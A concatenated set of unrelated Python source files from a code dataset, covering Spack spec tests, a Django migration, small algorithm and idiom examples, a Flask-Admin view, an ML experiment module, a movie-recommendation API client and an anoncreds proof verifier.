'mpileaks^mpich@2.0^callpath@1.5', '^mpich@1:3^callpath@1.4:1.6')\n self.check_unsatisfiable(\n 'mpileaks^mpich@4.0^callpath@1.5', '^mpich@1:3^callpath@1.4:1.6')\n self.check_unsatisfiable(\n 'mpileaks^mpich@2.0^callpath@1.7', '^mpich@1:3^callpath@1.4:1.6')\n self.check_unsatisfiable(\n 'mpileaks^mpich@4.0^callpath@1.7', '^mpich@1:3^callpath@1.4:1.6')\n\n def test_satisfies_virtual_dependencies(self):\n self.check_satisfies('mpileaks^mpi', '^mpi')\n self.check_satisfies('mpileaks^mpi', '^mpich')\n\n self.check_satisfies('mpileaks^mpi', '^zmpi')\n self.check_unsatisfiable('mpileaks^mpich', '^zmpi')\n\n def test_satisfies_virtual_dependency_versions(self):\n self.check_satisfies('mpileaks^mpi@1.5', '^mpi@1.2:1.6')\n self.check_unsatisfiable('mpileaks^mpi@3', '^mpi@1.2:1.6')\n\n self.check_satisfies('mpileaks^mpi@2:', '^mpich')\n self.check_satisfies('mpileaks^mpi@2:', '^mpich@3.0.4')\n self.check_satisfies('mpileaks^mpi@2:', '^mpich2@1.4')\n\n self.check_satisfies('mpileaks^mpi@1:', '^mpich2')\n self.check_satisfies('mpileaks^mpi@2:', '^mpich2')\n\n self.check_unsatisfiable('mpileaks^mpi@3:', '^mpich2@1.4')\n self.check_unsatisfiable('mpileaks^mpi@3:', '^mpich2')\n self.check_unsatisfiable('mpileaks^mpi@3:', '^mpich@1.0')\n\n def test_satisfies_matching_variant(self):\n self.check_satisfies('mpich+foo', 'mpich+foo')\n self.check_satisfies('mpich~foo', 'mpich~foo')\n self.check_satisfies('mpich foo=1', 'mpich foo=1')\n\n # confirm that synonymous syntax works correctly\n self.check_satisfies('mpich+foo', 'mpich foo=True')\n self.check_satisfies('mpich foo=true', 'mpich+foo')\n self.check_satisfies('mpich~foo', 'mpich foo=FALSE')\n self.check_satisfies('mpich foo=False', 'mpich~foo')\n\n def test_satisfies_unconstrained_variant(self):\n # only asked for mpich, no constraints. 
Either will do.\n self.check_satisfies('mpich+foo', 'mpich')\n self.check_satisfies('mpich~foo', 'mpich')\n self.check_satisfies('mpich foo=1', 'mpich')\n\n def test_unsatisfiable_variants(self):\n # This case is different depending on whether the specs are concrete.\n\n # 'mpich' is not concrete:\n self.check_satisfies('mpich', 'mpich+foo', False)\n self.check_satisfies('mpich', 'mpich~foo', False)\n self.check_satisfies('mpich', 'mpich foo=1', False)\n\n # 'mpich' is concrete:\n self.check_unsatisfiable('mpich', 'mpich+foo', True)\n self.check_unsatisfiable('mpich', 'mpich~foo', True)\n self.check_unsatisfiable('mpich', 'mpich foo=1', True)\n\n def test_unsatisfiable_variant_mismatch(self):\n # No matchi in specs\n self.check_unsatisfiable('mpich~foo', 'mpich+foo')\n self.check_unsatisfiable('mpich+foo', 'mpich~foo')\n self.check_unsatisfiable('mpich foo=1', 'mpich foo=2')\n\n def test_satisfies_matching_compiler_flag(self):\n self.check_satisfies('mpich cppflags=\"-O3\"', 'mpich cppflags=\"-O3\"')\n self.check_satisfies('mpich cppflags=\"-O3 -Wall\"',\n 'mpich cppflags=\"-O3 -Wall\"')\n\n def test_satisfies_unconstrained_compiler_flag(self):\n # only asked for mpich, no constraints. Any will do.\n self.check_satisfies('mpich cppflags=\"-O3\"', 'mpich')\n\n def test_unsatisfiable_compiler_flag(self):\n # This case is different depending on whether the specs are concrete.\n\n # 'mpich' is not concrete:\n self.check_satisfies('mpich', 'mpich cppflags=\"-O3\"', False)\n\n # 'mpich' is concrete:\n self.check_unsatisfiable('mpich', 'mpich cppflags=\"-O3\"', True)\n\n def test_unsatisfiable_compiler_flag_mismatch(self):\n # No matchi in specs\n self.check_unsatisfiable(\n 'mpich cppflags=\"-O3\"', 'mpich cppflags=\"-O2\"')\n\n def test_satisfies_virtual(self):\n # Don't use check_satisfies: it checks constrain() too, and\n # you can't constrain a non-virtual by a virtual.\n self.assertTrue(Spec('mpich').satisfies(Spec('mpi')))\n self.assertTrue(Spec('mpich2').satisfies(Spec('mpi')))\n self.assertTrue(Spec('zmpi').satisfies(Spec('mpi')))\n\n def test_satisfies_virtual_dep_with_virtual_constraint(self):\n \"\"\"Ensure we can satisfy virtual constraints when there are multiple\n vdep providers in the specs.\"\"\"\n self.assertTrue(\n Spec('netlib-lapack ^openblas').satisfies(\n 'netlib-lapack ^openblas'))\n self.assertFalse(\n Spec('netlib-lapack ^netlib-blas').satisfies(\n 'netlib-lapack ^openblas'))\n\n self.assertFalse(\n Spec('netlib-lapack ^openblas').satisfies(\n 'netlib-lapack ^netlib-blas'))\n self.assertTrue(\n Spec('netlib-lapack ^netlib-blas').satisfies(\n 'netlib-lapack ^netlib-blas'))\n\n # ========================================================================\n # Indexing specs\n # ========================================================================\n def test_self_index(self):\n s = Spec('callpath')\n self.assertTrue(s['callpath'] == s)\n\n def test_dep_index(self):\n s = Spec('callpath')\n s.normalize()\n\n self.assertTrue(s['callpath'] == s)\n self.assertTrue(type(s['dyninst']) == Spec)\n self.assertTrue(type(s['libdwarf']) == Spec)\n self.assertTrue(type(s['libelf']) == Spec)\n self.assertTrue(type(s['mpi']) == Spec)\n\n self.assertTrue(s['dyninst'].name == 'dyninst')\n self.assertTrue(s['libdwarf'].name == 'libdwarf')\n self.assertTrue(s['libelf'].name == 'libelf')\n self.assertTrue(s['mpi'].name == 'mpi')\n\n def test_spec_contains_deps(self):\n s = Spec('callpath')\n s.normalize()\n self.assertTrue('dyninst' in s)\n self.assertTrue('libdwarf' in s)\n 
self.assertTrue('libelf' in s)\n self.assertTrue('mpi' in s)\n\n def test_virtual_index(self):\n s = Spec('callpath')\n s.concretize()\n\n s_mpich = Spec('callpath ^mpich')\n s_mpich.concretize()\n\n s_mpich2 = Spec('callpath ^mpich2')\n s_mpich2.concretize()\n\n s_zmpi = Spec('callpath ^zmpi')\n s_zmpi.concretize()\n\n self.assertTrue(s['mpi'].name != 'mpi')\n self.assertTrue(s_mpich['mpi'].name == 'mpich')\n self.assertTrue(s_mpich2['mpi'].name == 'mpich2')\n self.assertTrue(s_zmpi['zmpi'].name == 'zmpi')\n\n for spec in [s, s_mpich, s_mpich2, s_zmpi]:\n self.assertTrue('mpi' in spec)\n\n # ========================================================================\n # Constraints\n # ========================================================================\n def test_constrain_variants(self):\n self.check_constrain('libelf@2.1:2.5', 'libelf@0:2.5', 'libelf@2.1:3')\n self.check_constrain('libelf@2.1:2.5%gcc@4.5:4.6',\n 'libelf@0:2.5%gcc@2:4.6',\n 'libelf@2.1:3%gcc@4.5:4.7')\n\n self.check_constrain('libelf+debug+foo', 'libelf+debug', 'libelf+foo')\n self.check_constrain('libelf+debug+foo',\n 'libelf+debug', 'libelf+debug+foo')\n\n self.check_constrain('libelf debug=2 foo=1',\n 'libelf debug=2', 'libelf foo=1')\n self.check_constrain('libelf debug=2 foo=1',\n 'libelf debug=2', 'libelf debug=2 foo=1')\n\n self.check_constrain('libelf+debug~foo', 'libelf+debug', 'libelf~foo')\n self.check_constrain('libelf+debug~foo',\n 'libelf+debug', 'libelf+debug~foo')\n\n def test_constrain_compiler_flags(self):\n self.check_constrain('libelf cflags=\"-O3\" cppflags=\"-Wall\"',\n 'libelf cflags=\"-O3\"', 'libelf cppflags=\"-Wall\"')\n self.check_constrain('libelf cflags=\"-O3\" cppflags=\"-Wall\"',\n 'libelf cflags=\"-O3\"',\n 'libelf cflags=\"-O3\" cppflags=\"-Wall\"')\n\n def test_constrain_architecture(self):\n self.check_constrain('libelf target=default_target os=default_os',\n 'libelf target=default_target os=default_os',\n 'libelf target=default_target os=default_os')\n self.check_constrain('libelf target=default_target os=default_os',\n 'libelf',\n 'libelf target=default_target os=default_os')\n\n def test_constrain_compiler(self):\n self.check_constrain('libelf %gcc@4.4.7',\n 'libelf %gcc@4.4.7', 'libelf %gcc@4.4.7')\n self.check_constrain('libelf %gcc@4.4.7',\n 'libelf', 'libelf %gcc@4.4.7')\n\n def test_invalid_constraint(self):\n self.check_invalid_constraint('libelf@0:2.0', 'libelf@2.1:3')\n self.check_invalid_constraint(\n 'libelf@0:2.5%gcc@4.8:4.9', 'libelf@2.1:3%gcc@4.5:4.7')\n\n self.check_invalid_constraint('libelf+debug', 'libelf~debug')\n self.check_invalid_constraint('libelf+debug~foo', 'libelf+debug+foo')\n self.check_invalid_constraint('libelf debug=2', 'libelf debug=1')\n\n self.check_invalid_constraint(\n 'libelf cppflags=\"-O3\"', 'libelf cppflags=\"-O2\"')\n self.check_invalid_constraint('libelf platform=test target=be os=be',\n 'libelf target=fe os=fe')\n\n def test_constrain_changed(self):\n self.check_constrain_changed('libelf', '@1.0')\n self.check_constrain_changed('libelf', '@1.0:5.0')\n self.check_constrain_changed('libelf', '%gcc')\n self.check_constrain_changed('libelf%gcc', '%gcc@4.5')\n self.check_constrain_changed('libelf', '+debug')\n self.check_constrain_changed('libelf', '~debug')\n self.check_constrain_changed('libelf', 'debug=2')\n self.check_constrain_changed('libelf', 'cppflags=\"-O3\"')\n\n platform = spack.architecture.platform()\n self.check_constrain_changed(\n 'libelf', 'target=' + platform.target('default_target').name)\n self.check_constrain_changed(\n 
'libelf', 'os=' + platform.operating_system('default_os').name)\n\n def test_constrain_not_changed(self):\n self.check_constrain_not_changed('libelf', 'libelf')\n self.check_constrain_not_changed('libelf@1.0', '@1.0')\n self.check_constrain_not_changed('libelf@1.0:5.0', '@1.0:5.0')\n self.check_constrain_not_changed('libelf%gcc', '%gcc')\n self.check_constrain_not_changed('libelf%gcc@4.5', '%gcc@4.5')\n self.check_constrain_not_changed('libelf+debug', '+debug')\n self.check_constrain_not_changed('libelf~debug', '~debug')\n self.check_constrain_not_changed('libelf debug=2', 'debug=2')\n self.check_constrain_not_changed(\n 'libelf cppflags=\"-O3\"', 'cppflags=\"-O3\"')\n\n platform = spack.architecture.platform()\n default_target = platform.target('default_target').name\n self.check_constrain_not_changed(\n 'libelf target=' + default_target, 'target=' + default_target)\n\n def test_constrain_dependency_changed(self):\n self.check_constrain_changed('libelf^foo', 'libelf^foo@1.0')\n self.check_constrain_changed('libelf^foo', 'libelf^foo@1.0:5.0')\n self.check_constrain_changed('libelf^foo', 'libelf^foo%gcc')\n self.check_constrain_changed('libelf^foo%gcc', 'libelf^foo%gcc@4.5')\n self.check_constrain_changed('libelf^foo', 'libelf^foo+debug')\n self.check_constrain_changed('libelf^foo', 'libelf^foo~debug')\n\n platform = spack.architecture.platform()\n default_target = platform.target('default_target').name\n self.check_constrain_changed(\n 'libelf^foo', 'libelf^foo target=' + default_target)\n\n def test_constrain_dependency_not_changed(self):\n self.check_constrain_not_changed('libelf^foo@1.0', 'libelf^foo@1.0')\n self.check_constrain_not_changed(\n 'libelf^foo@1.0:5.0', 'libelf^foo@1.0:5.0')\n self.check_constrain_not_changed('libelf^foo%gcc', 'libelf^foo%gcc')\n self.check_constrain_not_changed(\n 'libelf^foo%gcc@4.5', 'libelf^foo%gcc@4.5')\n self.check_constrain_not_changed(\n 'libelf^foo+debug', 'libelf^foo+debug')\n self.check_constrain_not_changed(\n 'libelf^foo~debug', 'libelf^foo~debug')\n self.check_constrain_not_changed(\n 'libelf^foo cppflags=\"-O3\"', 'libelf^foo cppflags=\"-O3\"')\n\n platform = spack.architecture.platform()\n default_target = platform.target('default_target').name\n self.check_constrain_not_changed(\n 'libelf^foo target=' + default_target,\n 'libelf^foo target=' + default_target)\n","repo_name":"ekTestuser/testcode","sub_path":"lib/spack/spack/test/spec_semantics.py","file_name":"spec_semantics.py","file_ext":"py","file_size_in_byte":18228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"29869242393","text":"users = {\n 'aeinstein': {\n 'first': 'albert',\n 'last': 'einstein',\n 'location': 'princeton',\n },\n\n 'mcurie': {\n 'first': 'marie',\n 'last': 'curie',\n 'location': 'paris',\n },\n }\n\n\nfor username,user_info in users.items():\n print(username)\n print(\"\\n\")\n full_name = f\"{user_info['first']} {user_info['last']}\"\n location = user_info['location']\n\n print(full_name)\n print(location)","repo_name":"gongcy958/js-mine","sub_path":"html/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"13042878084","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('persona', '__first__'),\n ]\n\n operations = [\n migrations.CreateModel(\n 
name='Celula',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('dia_celula', models.CharField(max_length=10)),\n ('hora_celula', models.TimeField()),\n ('direccion_celula', models.CharField(max_length=50)),\n ('encargado_celula', models.ForeignKey(blank=True, null=True, to='persona.Persona')),\n ],\n ),\n migrations.CreateModel(\n name='Miembros_celula',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('rol', models.CharField(max_length=10)),\n ('encargado_celula', models.ForeignKey(blank=True, null=True, to='celula.Celula')),\n ('miembro', models.ForeignKey(blank=True, null=True, to='persona.Persona')),\n ],\n ),\n ]\n","repo_name":"mfsalas/TesisIglesia","sub_path":"apps/celula/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"14790229389","text":"# In a row of dominoes, tops[i] and bottoms[i] represent the top and bottom halves of the\n# domino. (A domino is a tile with two numbers from 1 to 6 - one on each half of the tile)\n# We may rotate the i^th domino, so that tops[i] and bottoms[i] swap values.\n# Return the minimum number of rotations so that all the values in tops are the same, or all the\n# values in bottoms are the same.\n# Ex: tops = [1,2,1,4,1,1]\n# bottoms = [5,1,6,1,3,2]\n# result: 2\n# 2 <-> 1 , 4 <-> 1 => 2\n\n# Ex2: tops = [1,2,1,1,1,1]\n# bottoms = [5,1,6,1,3,2]\n# result: 1\n# 2 <-> 1 => 1\n\ndef minDominoRotations(tops, bottoms):\n if len(tops) == 0 or len(bottoms) == 0:\n return -1\n\n for target in [tops[0], bottoms[0]]:\n missingT , missingB = 0, 0\n for i, pair in enumerate(zip(tops, bottoms)):\n top, bottom = pair\n if target != top and target != bottom:\n break\n if top != target: missingT += 1\n elif bottom != target: missingB += 1\n if i == len(tops) - 1:\n return min(missingT, missingB)\n return -1\n \ntops = [1,2,1,4,1,1]\nbottoms = [5,1,6,1,3,2]\nprint(minDominoRotations(tops, bottoms))","repo_name":"SonMichael/algorithm","sub_path":"minimum_domino_rotations.py","file_name":"minimum_domino_rotations.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"70316003069","text":"\"\"\"\nEAFP - Eaiser to Forgiveness, No permission\nLBYL - Look Before You Leap\n\"\"\"\n\nmy_list = [1, 2, 3, 4, 5]\n\n# Non pythonic (LBYL - Look before you leap)\nif len(my_list) > 5:\n print(my_list[5])\nelse:\n print('Index does not exist')\n\n# Pythonic (EAFP)\ntry:\n print(my_list[5])\nexcept:\n print('Index does not exist')\n\nprint('*************************************')\n\nimport os\n\nmy_file = \"/path/to/my/file.txt\"\n\n# Race condition (non pythonic)/LBYL\nif os.access(my_file, os.R_OK):\n with open(my_file) as f:\n print(f.read())\nelse:\n print(\"File can't be accessed\")\n\n# No race condition (pythonic)/EAFP\ntry:\n f = open(my_file)\nexcept IOError as e:\n print(\"File can't be accessed\")\nelse:\n with f:\n print(f.read())\n","repo_name":"dattatembare/python-examples","sub_path":"src/advanced/EAFP.py","file_name":"EAFP.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"29038422401","text":"import csv\n\n\nclass CSVToList:\n \"\"\"Import data from a .csv file and return it as a 
list of lists.\"\"\"\n def __init__(self, filename):\n self.list = []\n with open(filename, 'r') as csv_file:\n read_csv = csv.reader(\n csv_file,\n delimiter=',',\n quoting=csv.QUOTE_NONNUMERIC\n )\n for line in read_csv:\n for element in line:\n self.list.append(element)\n","repo_name":"heyuka/WordleCheater","sub_path":"CSVToList.py","file_name":"CSVToList.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"28521068145","text":"from flask_admin.actions import action\nfrom flask_admin.form.rules import BaseRule\nfrom flask_admin.model.form import InlineFormAdmin\nfrom markupsafe import Markup\nfrom sqlalchemy.orm import contains_eager, load_only\nfrom wtforms.fields import IntegerField\nfrom wtforms.validators import AnyOf, InputRequired\n\nfrom extensions import celery\nfrom models import Section, TestAttempt\nfrom .helpers import BaseAdminView, CKTextAreaField, Link\n\n\nclass TestAttemptAdmin(BaseAdminView):\n column_searchable_list = (\n 'id', 'user.full_name', 'test_id', 'test.name', 'user_id',\n 'is_complete',\n 'is_graded', 'score',\n 'date')\n\n column_list = column_searchable_list\n can_export = True\n\n column_filters = column_searchable_list\n column_sortable_list = column_searchable_list\n\n @action('approve', 'Mark Complete',\n 'Are you sure you want to complete these tests?')\n def action_approve(self, ids):\n for id in ids:\n complete_test_attempt.delay(id)\n\n\n@celery.task()\ndef complete_test_attempt(test_attempt_id):\n test_attempt = (TestAttempt.query\n .filter(TestAttempt.id == test_attempt_id)\n .options(\n load_only(TestAttempt.user_id, TestAttempt.test_id))\n .one()\n )\n\n TestAttempt.calculate_score_for_test(test_attempt.user_id,\n test_attempt.test_id,\n should_persist=True)\n","repo_name":"harveyslash/backend-cleaned","sub_path":"beatest/beatest_flask_admin/TestAttemptAdmin.py","file_name":"TestAttemptAdmin.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"31459914601","text":"\"\"\"This module defines the different data experiments.\n\n Experiments are defined by what data is used when creating models.\n Some subset of the input data is used for each experiment.\n \"\"\"\nimport logging\nimport pathlib\nfrom abc import ABC, abstractmethod\nimport pandas as pd\nfrom aidp.data.groupings import ParkinsonsVsControlGrouping, MsaPspVsPdGrouping, MsaVsPdPspGrouping, PspVsPdMsaGrouping, PspVsMsaGrouping, PdVsMsaGrouping\nfrom aidp.ml.predictors import Predictor, LinearSvcPredictor\nfrom aidp.report.writers import LogReportWriter\nimport itertools\n\nclass DataExperiment(ABC):\n key = None\n groupings = [\n ParkinsonsVsControlGrouping(),\n MsaPspVsPdGrouping(),\n MsaVsPdPspGrouping(),\n PspVsPdMsaGrouping(),\n PspVsMsaGrouping(),\n PdVsMsaGrouping()\n \n ]\n \n report_writer = LogReportWriter()\n\n def __init__(self):\n self._logger = logging.getLogger(__name__)\n\n @abstractmethod\n def filter_data(self, data):\n pass #pragma: no cover\n\n def predict(self, data, model_key):\n self._logger.info(\"Starting model prediction\")\n filtered_data = self.filter_data(data)\n for grouping in self.groupings:\n predictor = Predictor()\n predictor.load_model_from_file(self.key, grouping.key, model_key)\n grouping.predictions = predictor.make_predictions(filtered_data)\n self._logger.info(\"Starting model prediction\")\n\n\n def train(self, data, model_key, save_models=True):\n 
self._logger.info(\"Starting model training\")\n #TODO: Implement Training mechanism\n filtered_data = self.filter_data(data)\n\n master_outcome_num = []\t\n master_outcome_grp = []\t\n\n for grouping in self.groupings:\n grouping.group_data(filtered_data).grouped_data\n self._logger.debug(\"Training model for grouping: %s\", grouping.key)\n trainer = LinearSvcPredictor()\n trainer.train_model(grouping.grouped_data) \n # Write report of the results\n training_output, validation_output = self.report_writer.write_report(trainer.classifier.best_estimator_, trainer.X_train, trainer.Y_train, trainer.X_test, trainer.Y_test)\n \n # make a group list\n master_outcome_grp.append(grouping.key)\n\n # make a data list\n combined_data = list(itertools.chain.from_iterable([training_output, validation_output])) \n \n # make it to small datafram and transpose\n smalldataframe = pd.DataFrame(combined_data)\n\n # append small dataframs\n master_outcome_num.append(smalldataframe.transpose())\n # Write model to pickle file\n if save_models:\n trainer.save_model_to_file(self.key, grouping.key, model_key)\n # save the master outcome\n Group_df = pd.DataFrame({'Group':master_outcome_grp})\n master_outcome_num_df = pd.concat(master_outcome_num, ignore_index=True)\n \n # column bind x \n master_outcome_num_bigdataframe = pd.concat([Group_df, master_outcome_num_df], axis=1, ignore_index=True)\n parent_path=str(pathlib.Path(__file__).parent.parent.parent)\n filepath = parent_path + \"/\" + str(model_key) + '_' + str(self.key) + '_Training_Performance.csv'\n master_outcome_num_bigdataframe.to_csv(filepath, header= ['Group', 'recall_t', 'precision_t', 'auc_t', 'specificity_t', \n 'npv_t', 'accuracy_t', 'weighted_sensitivity_t', 'weighted_ppv_t', 'weighted_specificity_t' ,\n 'weighted_npv_t', 'weighted_accuracy_t', 'recall_v', 'precision_v', 'auc_v', 'specificity_v', \n 'npv_v', 'accuracy_v', 'weighted_sensitivity_v', 'weighted_ppv_v', 'weighted_specificity_v' ,\n 'weighted_npv_v', 'weighted_accuracy_v'])\n \n self._logger.debug(\"Finished model training\") \n\n def get_results(self):\n # TODO: Add tests\n results = pd.DataFrame()\n for grouping in self.groupings:\n column = '%s_%s (%s Probability)' %(self.key, grouping.key, grouping.positive_label)\n results[column] = grouping.predictions\n\n return results\n\n def __str__(self):\n return type(self).__name__\n\nclass ClinicalOnlyDataExperiment(DataExperiment):\n key = \"clinical\"\n\n def filter_data(self, data):\n standard_data = get_standardized_data(data)\n return standard_data[['GroupID', 'Age', 'Sex', 'UPDRS']]\n\nclass ImagingOnlyDataExperiment(DataExperiment):\n key = \"dmri\"\n\n def filter_data(self, data):\n standard_data = get_standardized_data(data)\n return standard_data.drop(['UPDRS'], axis=1)\n\nclass FullDataExperiment(DataExperiment):\n key = \"both\"\n\n def filter_data(self, data):\n return get_standardized_data(data)\n\n\ndef get_standardized_data(data):\n # TODO: Find a cleaner way to do this\n columns_conf = pathlib.Path(__file__).parent.parent.parent / 'resources/column_names.conf'\n with open(str(columns_conf)) as f:\n columns = f.read().splitlines() \n return data[columns]\n","repo_name":"weienwang/aidp_Kerrick_Testing","sub_path":"aidp/data/experiments.py","file_name":"experiments.py","file_ext":"py","file_size_in_byte":5115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"11373321453","text":"import requests\nimport json\nimport os\nfrom dotenv import load_dotenv\n\n#genres 
\ngenres = [\n    {\"id\":28, \"genre\": \"action\"},\n    {\"id\":16, \"genre\": \"animated\"},\n    {\"id\":99, \"genre\": \"documentary\"},\n    {\"id\":18, \"genre\": \"drama\"},\n    {\"id\":10751, \"genre\": \"family\"},\n    {\"id\":14, \"genre\": \"fantasy\"},\n    {\"id\":36, \"genre\": \"history\"},\n    {\"id\":35, \"genre\": \"comedy\"},\n    {\"id\":10752, \"genre\": \"war\"},\n    {\"id\":80, \"genre\": \"crime\"},\n    {\"id\":10402, \"genre\": \"music\"},\n    {\"id\":9648, \"genre\": \"mystery\"},\n    {\"id\":10749, \"genre\": \"romance\"},\n    {\"id\":878, \"genre\": \"sci fi\"},\n    {\"id\":27, \"genre\": \"horror\"},\n    {\"id\":10770, \"genre\": \"TV movie\"},\n    {\"id\":53, \"genre\": \"thriller\"},\n    {\"id\":37, \"genre\": \"western\"},\n    {\"id\":12, \"genre\": \"adventure\"},\n]\n\n#API key\nload_dotenv()\n\nAPI_KEY = os.getenv(\"ALPHAVANTAGE_API_KEY\")\n\ndef get_movie_recommendations (genre, year, certification, sort):\n    \"\"\"\n    Fetches movies from the Movies API, for a given genre, year, certification, and sorting criteria.\n\n    Params:\n        genre (str) the requested genre, like \"action\"\n        year (str) the requested year, like \"2020\"\n        certification (str) the requested certification, like \"PG-13\"\n        sort (str) the requested sorting method, like \"popularity\"\n\n    Example:\n        result = get_movie_recommendations(genre=\"action\", year=\"2020\", certification=\"PG-13\", sort=\"popularity\")\n\n    Returns the movie as a parsed response with its attributes such as \"original_title\" and \"release_date\".\n    \"\"\"\n    features = []\n\n    #inputs\n    for item in genres:\n        if genre.lower() == item[\"genre\"]:\n            features.append(\"&with_genres=\" + str(item[\"id\"]))\n    \n    if len(features) == 0:\n        features.append(\"\")\n\n    features.append(\"&primary_release_year=\" + str(year))\n\n    features.append(\"&certification_country=US&certification.lte=\" + str(certification.upper()))\n\n    valid_sorts = [\"popularity\", \"revenue\", \"rating\"]\n\n    if sort.lower() == valid_sorts[0]:\n        features.append(\"&sort_by=popularity.desc\")\n    elif sort.lower() == valid_sorts[1]:\n        features.append(\"&sort_by=revenue.desc\")\n    elif sort.lower() == valid_sorts[2]:\n        features.append(\"&sort_by=vote_average.desc&vote_count.gte=1000\")\n\n    #API request \n    request_url = f\"https://api.themoviedb.org/3/discover/movie?api_key={API_KEY}{features[0]}&with_original_language=en{features[1]}{features[2]}{features[3]}\" \n\n    response = requests.get(request_url)\n\n    parsed_response = json.loads(response.text)\n\n    #output\n    if parsed_response[\"total_results\"] < 5:\n        return \"Sorry, couldn't find enough movies for those criteria.\"\n\n    recommendations = []\n\n    recommendations.append(parsed_response[\"results\"][0])\n    recommendations.append(parsed_response[\"results\"][1])\n    recommendations.append(parsed_response[\"results\"][2])\n    recommendations.append(parsed_response[\"results\"][3])\n    recommendations.append(parsed_response[\"results\"][4])\n\n    return recommendations","repo_name":"mcastillo23/movie-finder","sub_path":"app/movie_finder.py","file_name":"movie_finder.py","file_ext":"py","file_size_in_byte":3014,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"}
{"seq_id":"705263070","text":"from anoncreds.protocol.globals import LARGE_E_START, ITERATIONS, DELTA\nfrom anoncreds.protocol.primary.primary_proof_common import calcTeq, calcTge\nfrom anoncreds.protocol.types import PrimaryEqualProof, \\\n    PrimaryPredicateGEProof, PrimaryProof, ID\nfrom anoncreds.protocol.wallet.wallet import Wallet\nfrom config.config
import cmod\n\n\nclass PrimaryProofVerifier:\n def __init__(self, wallet: Wallet):\n self._wallet = wallet\n\n async def verify(self, schemaId, cHash, primaryProof: PrimaryProof):\n cH = cmod.integer(cHash)\n THat = await self._verifyEquality(schemaId, cH, primaryProof.eqProof)\n for geProof in primaryProof.geProofs:\n THat += await self._verifyGEPredicate(schemaId, cH, geProof)\n\n return THat\n\n async def _verifyEquality(self, schemaId, cH, proof: PrimaryEqualProof):\n THat = []\n pk = await self._wallet.getPublicKey(ID(schemaId=schemaId))\n attrNames = (await self._wallet.getSchema(ID(schemaId=schemaId))).attrNames\n unrevealedAttrNames = set(attrNames) - set(proof.revealedAttrs.keys())\n\n T1 = calcTeq(pk, proof.Aprime, proof.e, proof.v,\n proof.m, proof.m1, proof.m2,\n unrevealedAttrNames)\n\n Rar = 1 % pk.N\n for attrName in proof.revealedAttrs.keys():\n Rar *= pk.R[str(attrName)] ** proof.revealedAttrs[str(attrName)]\n Rar *= proof.Aprime ** (2 ** LARGE_E_START)\n T2 = (pk.Z / Rar) ** (-1 * cH) % pk.N\n T = T1 * T2 % pk.N\n\n THat.append(T)\n return THat\n\n async def _verifyGEPredicate(self, schemaId, cH,\n proof: PrimaryPredicateGEProof):\n pk = await self._wallet.getPublicKey(ID(schemaId=schemaId))\n v = proof.predicate.value\n\n TauList = calcTge(pk, proof.u, proof.r, proof.mj, proof.alpha, proof.T)\n\n for i in range(0, ITERATIONS):\n TT = proof.T[str(i)] ** (-1 * cH) % pk.N\n TauList[i] = TauList[i] * TT % pk.N\n TauList[ITERATIONS] = TauList[ITERATIONS] * (\n (proof.T[DELTA] * (pk.Z ** v)) ** (-1 * cH)) % pk.N\n TauList[ITERATIONS + 1] = (TauList[ITERATIONS + 1] * (\n proof.T[DELTA] ** (-1 * cH))) % pk.N\n\n return TauList\n","repo_name":"hyperledger-archives/indy-anoncreds","sub_path":"anoncreds/protocol/primary/primary_proof_verifier.py","file_name":"primary_proof_verifier.py","file_ext":"py","file_size_in_byte":2258,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"6"} +{"seq_id":"6993353156","text":"from common.reference_frame import PointRef, Ref\nfrom entity_base.image.image_state import ImageStatesFactory\nfrom entity_ui.selector_menu.configurations.common_actions import HighlightCommandAction, HighlightID\nfrom entity_ui.selector_menu.selector_menu_factory import *\nfrom models.path_models.path_segment_state.segment_type import SegmentType\nfrom models.path_models.segment_direction import SegmentDirection\nfrom entities.root_container.field_container.segment.abstract_segment_entity import AbstractSegmentEntity\nfrom entities.root_container.field_container.segment.straight_segment_entity import StraightSegmentEntity\nfrom models.project_history_interface import ProjectHistoryInterface\n\n# When clicked, segment toggles forward/reverse direction\nclass DirectionButtonID(Enum):\n STRAIGHT_FORWARD = 0\n CURVE_FORWARD = 1\n STRAIGHT_REVERSE = 2\n CURVE_REVERSE = 3\nclass InvertDirectionAction(MenuClickAction[StraightSegmentEntity]):\n\n # Get the current direction of the segment\n def getStateID(self, targetEntity: StraightSegmentEntity) -> Enum:\n isStraight = (targetEntity.model.getType() == SegmentType.STRAIGHT)\n if targetEntity.model.getDirection() == SegmentDirection.FORWARD:\n return DirectionButtonID.STRAIGHT_FORWARD if isStraight else DirectionButtonID.CURVE_FORWARD\n else:\n return DirectionButtonID.STRAIGHT_REVERSE if isStraight else DirectionButtonID.CURVE_REVERSE\n\n # Toggle the forward/reverse direction\n def onClick(self, targetEntity: StraightSegmentEntity, mouse: tuple):\n 
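# Only the model state changes here; the menu icon for this action is
# re-derived via getStateID(), which reads the segment's type and direction.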
